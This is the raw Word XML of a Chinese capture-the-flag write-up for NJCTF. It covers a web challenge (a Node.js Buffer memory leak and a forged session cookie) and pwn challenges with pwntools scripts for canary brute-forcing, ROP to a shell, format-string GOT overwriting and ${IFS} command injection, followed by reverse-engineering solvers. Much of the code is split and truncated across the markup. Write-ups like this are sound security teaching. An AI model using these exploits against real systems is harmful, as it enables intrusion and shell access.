          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lone下来审计下代码，发现在index.js上有登陆的逻辑。这里能找到类似的题：</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00112F5A">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>https://www.smrrd.de/nodejs-hacking-challenge-writeup.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，大概原理是js的Buffer遇到数字参数时会将内存数据泄露出来。我们找到一个md5值是全数字的字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ximaz’</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，将其当作密码不断地登陆，最终泄露出在内存中的flag：</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NJCTF{P1e45e_s3arch_th1s_s0urce_cod3_0lddriver}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Chall 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E0DCE" w:rsidRPr="00112F5A" w:rsidRDefault="009E0DCE" w:rsidP="009E0DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>之前Chall1获取的Flag其实是app的secret_key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修改app的代码，将secret_key改为刚刚获取的flag的值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lastRenderedPageBreak/>
        <w:t>然后去掉app的登录逻辑直接以admin登录，之后在本地运行app获取admin的session和session.sign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`session=eyJhZG1pbiI6InllcyJ9; session.sig=DLXp3JcD1oX3c8v4pUgOAn-pDYo`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带上这个Cookie去访问题目中/admin即可登录获取flag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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1879010"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="19" name="图片 19" descr="D:\Desktop\wp\NJCTFWP\web-wp\image\ch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wp\NJCTFWP\web-wp\image\chall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pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>PWN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M</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>essager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</w:rPr>
        <w:t>题目是模拟了一个socket通信服务端程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，服务端</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>每次</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收到</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>连接请求后</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>就fork一个子进程来与之通信</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t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/>
        </w:rPr>
        <w:t>问题出在sub_400BE9函数内</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B477BC7" wp14:editId="20643479">
            <wp:extent cx="3586480" cy="19820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269" cy="19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/>
        </w:rPr>
        <w:t>局部变量s在栈上申请了</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>104的空间，但是可以通过recv函数向该地址读入1024个字符，造成栈溢出。此题开了canary，所以要想利用必须爆破canary的值：因为服务端程序messager运行后，该程序的canary的值就不变了，而每次通过fork出来的子进程也将继承主进程的canary，所以可以分8次，每次爆破canary的一个字节。</w:t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得到canary的值后，覆盖返回地址到地址0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>400bc6</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>通过send函数把flag的值送回来</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F3DBBC2" wp14:editId="3E58C4FD">
            <wp:extent cx="5110480" cy="1547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016" cy="15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ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>脚本如下</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：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from pwn import *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#server = process('./messager'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#init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debug = 0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context.log_level = 'debug'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if debug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gdb.attach(pidof('messager')[0],open('aa')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#raw_input("pause"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canary = ''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for i in range(8)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for c in range(256)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f debug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o = remote("127.0.0.1",5555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else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o = remote('218.2.197.234',2090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o.recvuntil('Welcome!'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payload = 'A'*104 + canary + chr(c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o.send(payload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o.recvline(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try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temp =  io.recvline(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print 'aa'+temp+'bb'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canary += chr(c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except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o.close(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continue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break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lastRenderedPageBreak/>
        <w:t>print 'canary = '+ canary.encode('hex'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if debug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o = remote("127.0.0.1",5555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else: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DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>io = remote('218.2.197.234',2090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payload1 = 'A'*104 + canary + p64(0x602160) + p64(0x400bc6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io.recvuntil('Welcome!'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io.send(payload1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io.recv()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="80" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15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 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cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>io.interactive()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Vegas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这个题的漏洞在于时间种子是可预测的，这个题中比较坑的点可能是产生随机数的算法，在使用ida反编译的时候需要注意C和python中符号优先级的区别，其次，出题人故意把系统时间增加了3000多秒，具体是多少没有注意，暴力跑一下就可以。在预测随机数后就可以通过多次写数据造成栈溢出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from pwn import *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 xml:space="preserve">from ctypes import * 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import os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debug = 0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local = 0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slog = 0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if slog: context.log_level = True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def myrand()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global rand_values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global rand_index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v0 = rand_index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v1 = rand_values[rand_index]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v2 = (rand_index + 15) &amp; 0xF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v3 = rand_values[(rand_index + 13) &amp; 0xF]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v4 = rand_values[v2]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v5 = rand_values[rand_index] &lt;&lt; 16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rand_index = (rand_index + 15) &amp; 0xF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v6 = v3 ^ v5 ^ v1 ^ (v3 &lt;&lt; 15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v7 = rand_values[(v0 + 9) &amp; 0xF] ^ (rand_values[(v0 + 9) &amp; 0xF] &gt;&gt; 11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rand_values[(v0 + 10) &amp; 0xF] = v7 ^ v6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result = ((8 * (v7 ^ v6)) &amp; 0xDEADBEE8) ^ (v7 &lt;&lt; 24) ^ (v6 &lt;&lt; 10) ^ v7 ^ v4 ^ (2 * v4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result &amp;= 0xffffffff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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>rand_values[v2] = result;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return result;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rand_values = []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rand_index = 0xb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#do initial job before connect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 xml:space="preserve">libc = CDLL("libc.so.6") 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def leak_rand()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p.recvuntil('Choice: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p.sendline('1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p.recvuntil('Odd or Even?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p.sendline('1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p.recvuntil('number is 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leak_rand = int(p.recvline()[:-1], 16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return leak_rand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def search_root(leak_rand)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global rand_values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global rand_index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global now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print now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ii = 4000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while True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if ii % 1000 == 0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rint ii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rand_values = []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rand_index = 0xb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libc.srand(now + ii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for j in range(16)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rand_values.append(libc.rand()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if myrand() == leak_rand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rint '---'*20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break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ii -= 1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if local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p = process('./vegas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else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p = remote('218.2.197.235', 23747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now = libc.time(0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mleak_rand = leak_rand(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print 'leak rand is', hex(mleak_rand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search_root(mleak_rand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p.recvuntil('step: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p.sendline('a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'''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#now = libc.time(0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libc.srand(now-1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rand_value = []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rand_index = 0xb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for i in range(100)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>rand_values.append(libc.rand()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'''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if local and debug: gdb.attach(p, open('debug')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def mwrite(astr)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  <w:t xml:space="preserve">for i in range(len(astr)): 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.recvuntil('Choice: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.sendline('1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check = myrand(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rint 'local rand is',hex(check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if check &amp; 1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.sendline('1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else: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.sendline('2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. recvuntil('step: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ab/>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>p.sendline(astr[i]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mwrite('a'*31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p.recvuntil('a'*32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stack_addr = p.recvline()[:-1].ljust(8, '\0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mwrite(stack_addr.ljust(28, 'a')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read_plt = 0x080484a0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system_plt = 0x080484e0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 xml:space="preserve">pop3 = 0x8048763 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bss_addr = 0x0804b100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rop = p32(read_plt) + p32(pop3) + p32(0) + p32(bss_addr) + p32(8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rop += p32(system_plt) + p32(0) + p32(bss_addr) +  p32(0) + p32(0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lastRenderedPageBreak/>
        <w:t>mwrite(rop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p.sendline('3')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>p.sendline('/bin/sh\x00'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sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C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Vsvs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00510691" w:rsidRDefault="00510691" w:rsidP="00510691">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Fuzz一下 输入access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>code输入22可进入下一步，然后name部分超过1024个字节会当作命令来执行。空格会被去掉，所以不能直接cat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag。先输入/bin/sh，或者cat</w:t>
      </w:r>
      <w:r>
        <w:t>${IFS}flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00510691" w:rsidRPr="00510691" w:rsidRDefault="00510691" w:rsidP="0051069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2E62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0489BE" wp14:editId="4924F159">
            <wp:extent cx="6343650" cy="1546265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="图片 23" descr="C:\Users\zhang\Documents\Tencent Files\791941538\Image\Group\QAGUERC)YCN8RHW)JAJ9@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\Documents\Tencent Files\791941538\Image\Group\QAGUERC)YCN8RHW)JAJ9@X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86" cy="15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Pingme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</w:rPr>
        <w:t>格式化字符串漏洞，没有给程序。思路是先把栈dump出来，栈上存放的有start和main的地址，然后把main函数dump出来。根据偏移可找到函数plt的位置，plt里面存放的就是jmp got_address，然后把got表dump出来。改写printf的got表为system地址，输入/bin/sh即可。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</w:rPr>
        <w:t>Main函数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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5271770" cy="402336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</w:rPr>
        <w:t>Got表：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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5064760" cy="50488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</w:rPr>
        <w:t>代码如下：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#coding=utf-8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from pwn import *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=remote('218.2.197.235',23745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libc=ELF('./libc.so.2-13'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.recvuntil('\n')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rintf_got=0x8049974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ayload='A'*20+p32(printf_got)+'|%12$s|'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.sendline(payload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data=p.recvuntil('\n'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rint data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rintf_addr=u32(data[25:29]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rint "printf_addr",": ",hex(printf_addr)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libc.address=printf_addr-libc.symbols['printf']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rint "libc.address",": ",hex((libc.address)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system_addr=libc.symbols['system']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lastRenderedPageBreak/>
        <w:t>print "system_addr",": ",hex((system_addr))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system_l=system_addr&amp;0xffff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system_h=system_addr&gt;&gt;16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ayload='%'+str(system_l)+'c%14$hn'+'%'+str(system_h-system_l)+'c%15$hn'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ayload=payload.ljust(28,'A'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ayload+=p32(printf_got)+p32(printf_got+0x2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rint payload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.sendline(payload)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.sendline('/bin/sh'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.interactive()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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5271770" cy="175704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1"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>REVERSE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F</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>irst</w:t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吐槽一下这次的逆向题，那个re300我真的是无力了，简直就是misc，浪费我半天，这道题还算正常，理一下思路。</w:t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程序一开始产生6个随机数，后面会用到：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center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/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1757C61A" wp14:editId="1D578653">
            <wp:extent cx="5098415" cy="1799590"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="8" name="图片 8" descr="C:\Users\ryxc1994\AppData\Local\YNote\data\zhangsuoxing@126.com\68c08e23eedd40069e3e0f3a6880e367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xc1994\AppData\Local\YNote\data\zhangsuoxing@126.com\68c08e23eedd40069e3e0f3a6880e367\clipboar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lastRenderedPageBreak/>
        <w:t>然后就是获取用户输入，后面一段奇怪的其实就是在统计输入的长度：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41C8DE71" wp14:editId="520A690B">
            <wp:extent cx="5777681" cy="1869312"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="图片 9" descr="C:\Users\ryxc1994\AppData\Local\YNote\data\zhangsuoxing@126.com\bf2a25db18c54157b7dfd9092527fa41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yxc1994\AppData\Local\YNote\data\zhangsuoxing@126.com\bf2a25db18c54157b7dfd9092527fa41\clipboa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31" cy="18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然后程序根据用户输入，产生一个整数v11：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center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/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="746CBC96" wp14:editId="0A8BAE6C">
            <wp:extent cx="5503545" cy="1597025"/>
            <wp:effectExtent l="0" t="0" r="1905" b="3175"/>
            <wp:docPr id="10" name="图片 10" descr="C:\Users\ryxc1994\AppData\Local\YNote\data\zhangsuoxing@126.com\0093e42ca73447e3bb8fb6be35438af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xc1994\AppData\Local\YNote\data\zhangsuoxing@126.com\0093e42ca73447e3bb8fb6be35438afc\clipbo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接下来程序开启了6个线程：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center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/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BAF1650" wp14:editId="76F7D3ED">
            <wp:extent cx="5486400" cy="2731607"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="图片 11" descr="C:\Users\ryxc1994\AppData\Local\YNote\data\zhangsuoxing@126.com\b6773d8649fb43a7bedc055d0db1fa3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xc1994\AppData\Local\YNote\data\zhangsuoxing@126.com\b6773d8649fb43a7bedc055d0db1fa33\clipboa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16" cy="27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看一下线程调用的start_routine函数，这里会对输入4字节4字节的作md5，然后将哈希值和check数组比较，相等的话就赋值给数组0x602220，不过有一点得注意，由于前面产生的随机数，每个线程都会sleep一个随机值，所以将输入4字节4字节赋值给数组的顺序是随机的，这是一个坑！！！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center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1C8A1546" wp14:editId="785EE0BD">
            <wp:extent cx="5139680" cy="4988378"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3175"/>
            <wp:docPr id="12" name="图片 12" descr="C:\Users\ryxc1994\AppData\Local\YNote\data\zhangsuoxing@126.com\994cdadf316e4aa18f7d60a13b98e94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xc1994\AppData\Local\YNote\data\zhangsuoxing@126.com\994cdadf316e4aa18f7d60a13b98e946\clipboar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08" cy="49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最后程序会和v11还有数组0x6020df里面的内容要异或，这里v11产生的顺序是按照check数组md5爆破的顺序来的，但是与数组0x6020df异或的顺序是随机的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center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/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AE0A958" wp14:editId="47CD8A62">
            <wp:extent cx="5775767" cy="1939465"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="13" name="图片 13" descr="C:\Users\ryxc1994\AppData\Local\YNote\data\zhangsuoxing@126.com\1c57d18c78964d42818e9125592ddf17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xc1994\AppData\Local\YNote\data\zhangsuoxing@126.com\1c57d18c78964d42818e9125592ddf17\clipboa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19" cy="19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通过check数组，我们爆破出来的顺序是：juhu，hfen，laps，iuer，hjif，dunu。而与数组0x6020df异或的顺序必须是这样才能得出正确的flag：juhu，hfen，laps，dunu，hjif，iuer。</w:t>
      </w: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爆破脚本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60C" w:rsidRPr="00112F5A" w:rsidTr="00231CF7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr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import hashlib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lastRenderedPageBreak/>
              <w:t>check="4746bbbd02bb590fbeac2821ece8fc5cad749265ca7503ef4386b38fc12c4227b03ecc45a7ec2da7be3c5ffe121734e8"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for w in range(0,6):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for i in range(48,123):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for j in range(48,123):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  for m in range(48,123):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      for n in range(48,123):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          temp = chr(i)+chr(j)+chr(m)+chr(n)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          hashvalue = hashlib.md5(temp).hexdigest()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          if hashvalue[0:16] == check[w*16:w*16+16]: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              print w,temp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>求flag脚本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60C" w:rsidRPr="00112F5A" w:rsidTr="00231CF7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr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input = "juhuhfenlapsiuerhjifdunu"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check = "fee9f4e2f1faf4e4f0e7e4e5e3f2f5efe8fff6f4fdb4a5b2"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length =24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i = 0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v11 = 0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while(i!=length):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v12 = ord(input[i])+i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v11 = v11 ^ v12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i = i+1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input = "juhuhfenlapsdunuhjifiuer"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check = check.decode("hex")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flag = ""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for i in range(0,24):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temp = ord(input[i])^v11^ord(check[i])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 xml:space="preserve">    flag += chr(temp)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print flag</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="00231CF7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112F5A">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>#goodjobyougetthisflag233</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pP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On the flly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</w:rPr>
        <w:t>感觉是misc...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</w:rPr>
        <w:t>把开头</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>X]UCPl</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>与NJCTF{异或后为22、23、22、22、23，猜测把依次异或22、23即可。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s="X]UCPl$t%''' #\"&amp;#'s'%u !%'w't$t p/ '!uk"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r=''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lastRenderedPageBreak/>
        <w:t>for i in range(len(s)):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ab/>
